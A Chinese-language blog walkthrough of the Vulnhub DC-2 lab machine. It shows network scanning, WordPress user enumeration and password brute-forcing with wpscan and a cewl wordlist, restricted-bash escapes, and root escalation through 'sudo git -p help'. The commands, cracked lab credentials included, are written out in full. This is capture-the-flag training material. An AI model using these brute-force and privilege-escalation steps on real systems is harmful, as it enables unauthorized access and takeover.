【Vulnhub靶机系列】DC2

基本信息

Kali:192.168.61.145

DC2:192.168.61.162

实验过程

在Kali中先进行内网探活

sudo arp-scan --interface eth0 192.168.61.1/24

图片

排查筛选得知,192.168.61.162为DC2的IP地址。

接下来用Nmap对DC2进行端口扫描。

nmap -sC -sV -p- -oA ~/vulnhub/DC2 192.168.61.162

图片

可知DC2开启了80端口和7744端口,根据信息可知7744端口为ssh。

我们先访问下DC2的80端口。

返回一个错误页面,F12可以看到网页做了一个301永久重定向。

图片

图片

我们编辑下kali的hosts文件:

sudo vim /etc/hosts

添加一条:

192.168.61.162 dc-2

图片

再次用kali打开dc-2,即可正常显示:

图片

在页面中即可找到flag1:

图片

Flag 1: Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl. More passwords is always better, but sometimes you just can’t win them all. Log in as one to see the next flag. If you can’t find it, log in as another.

Flag1提示我们要使用cwel来生成密码字典

cewl dc-2 > pwd.txt

图片

使用wpscan可以扫出当前wp的漏洞

wpscan --url http://dc-2/

图片

我们用wpscan枚举出当前存在的用户,并存入username.txt中。

wpscan --url http://dc-2 -e u

图片

然后我们用刚刚生成的username.txt和pwd.txt进行账号密码遍历:

wpscan --url http://dc-2/ -U username.txt -P pwd.txt

[SUCCESS] ‐ jerry / adipiscing[SUCCESS] ‐ tom / parturient

图片

然后我们打开wp的管理后台,一般都是wp-admin

http://dc‐2/wp‐admin

图片

Flag 2: If you can't exploit WordPress and take a shortcut, there is another way. Hope you found another entry point.

靶机除了80还有7744(SSH)端口,我们也可以用这2个账号尝试下 

jerry无法登录SSH,但是tom是可以顺利登录SSH

图片

我们先看看tom可以执行那些命令

tom@DC-2:~$ echo $PATH
tom@DC-2:~$ echo /home/tom/usr/bin/*

图片

可以看到只能执行less,ls,scp,vi

我们ls下发现flag3.txt,在用less获取flag3的内容:

图片

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes

感觉这句话的意思像是提示我们要su到jerry,但是我们无法使用su命令

所以我们需要绕过rbash(受限的bash)

tom@DC‐2:~$ BASH_CMDS[a]=/bin/sh;a$ /bin/bashtom@DC‐2:~$ export PATH=$PATH:/bin/tom@DC‐2:~$ export PATH=$PATH:/usr/bin

图片

然后我们切换到jerry,密码为adipiscing

切换到jerry的家目录就可以得到flag4.txt.

图片

查找下suid文件

find / -perm -u=s -type f 2>/dev/null

图片

并没有像dc-1那样可以利用find 

那么我们看看jerry有没有可以执行的具有root权限的命令

sudo ‐l

 

图片

这里有一个很明显的git命令,还是不需要密码的

https://www.cnblogs.com/zaqzzz/p/12075132.html#3git%E6%8F%90%E6%9D%83

jerry@DC‐2:~$ sudo git ‐p help!/bin/bash

图片

得到最后的final-flag

图片

额外内容


 

rbash另一种绕过方式

# vi编辑shell# 命令模式分别输入 :set shell=/bin/bash:shelltom@DC‐2:~$ vi shelltom@DC‐2:~$ export PATH=/usr/sbin:/usr/bin:/sbin:/bintom@DC‐2:~$ su jerryPassword:jerry@DC‐2:/home/tom$

 

图片

另一种查看当前用户可用命令方式

 

compgen ‐c

图片

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值